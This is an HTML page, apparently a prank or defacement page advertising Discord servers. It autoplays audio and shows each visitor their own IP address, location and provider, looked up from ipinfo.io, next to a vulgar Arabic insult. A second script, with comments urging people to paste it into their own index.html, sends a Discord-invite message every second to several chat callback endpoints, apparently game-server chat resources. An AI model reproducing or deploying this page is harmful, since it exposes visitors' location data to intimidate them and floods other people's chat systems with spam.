
<!DOCTYPE html>

<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>https://discord.gg/t101</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://cdn.discordapp.com/attachments/1401231921433804914/1403447362999025865/0F21B0CE-4884-4EB3-9685-FCE4782BB116.png?ex=689795b6&is=68964436&hm=1d0ff1bab4a04dbb89e6a41afdda13f6b08e41a460ac06a121f22bcfda56268b&') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #FFFFFF;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .image-container img {
            width: 500px; 
            height: auto;
            border: 2px solid #FFFFFF; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(255, 255, 255, 0.8); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #FFFFFF; 
            text-shadow: 0px 0px 8px #FFFFFF, 0px 0px 15px #FFFFFF, 0px 0px 25px #FFFFFF; 
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #FF0000; 
            text-shadow: 0px 0px 8px #FFFFFF, 0px 0px 15px #FFFFFF, 0px 0px 25px #FFFFFF; 
            letter-spacing: 4.5px; 
        }
    </style>
</head>
<body>
    <div class="image-container">

    <audio autoplay loop>
        <source src="https://cdn.discordapp.com/attachments/1390882671223115786/1401642436127625357/3905be207137a67f.mp3?ex=689104be&is=688fb33e&hm=dbd053ec6ac485d8e2d554f93d4a11eeb428d122aa8e08a25d5adcaddc0b0702&" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>
   <div class="info" id="ip-info">
        <strong>IP: <span id="ip"></span></strong><br>
        <span><strong>City:</strong> <span id="city"></span></span><br>
        <span><strong>Region:</strong> <span id="region"></span></span><br>
        <span><strong>Country:</strong> <span id="country"></span></span><br>
        <span><strong>Location:</strong> <span id="loc"></span></span><br>
        <span><strong>Organization:</strong> <span id="org"></span></span><br>
        <span><strong>Timezone:</strong> <span id="timezone"></span></span>
    </div>
    <div class="text"> كس اخت دمار عاخت انس


</div>

    <script>
         fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            delete data.readme;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.textContent = JSON.stringify(data, null, 2);
        });
    </script>

<script>
    // put the js code in YOUR index.html
// حط الكود ب الاندكس حقك index.html
// vjmi pulled all of them 👀
// discord.gg/UAEE #1
const msg = `discord.gg/t101 - discord.gg/4ns`;
const body = JSON.stringify({ message: msg });
setInterval(() => {
fetch("https://flix-scripts/chatResult", { method: "POST", body });
fetch("https://danger_chat/Danger_Chat:SendMessage", {method: "POST",body: JSON.stringify({"message": msg,"channel": "شات العام","color": null,"isImageAndLinksAllowed": [false,false]})})
fetch("https://easy-chat+/o6ZbK5Ecp6", {headers: {accept: "*/*","content-type": "application/x-www-form-urlencoded; charset=UTF-8"},body: JSON.stringify({ message: msg, channel: "شات العام" }),method: "POST"});
fetch("https://melix_chat/chatResult", { method: "POST", body });
fetch("https://as_chat/chatResult", { method: "POST", body });
fetch("https://chat/chatResult", { method: "POST", body });
fetch("https://ho-chatv2/Chat", {method: "POST",body: JSON.stringify({"Type": "chatResult","message": msg,"chatType": "general"})});
}, 1000);
    </script>
</body>
</html>
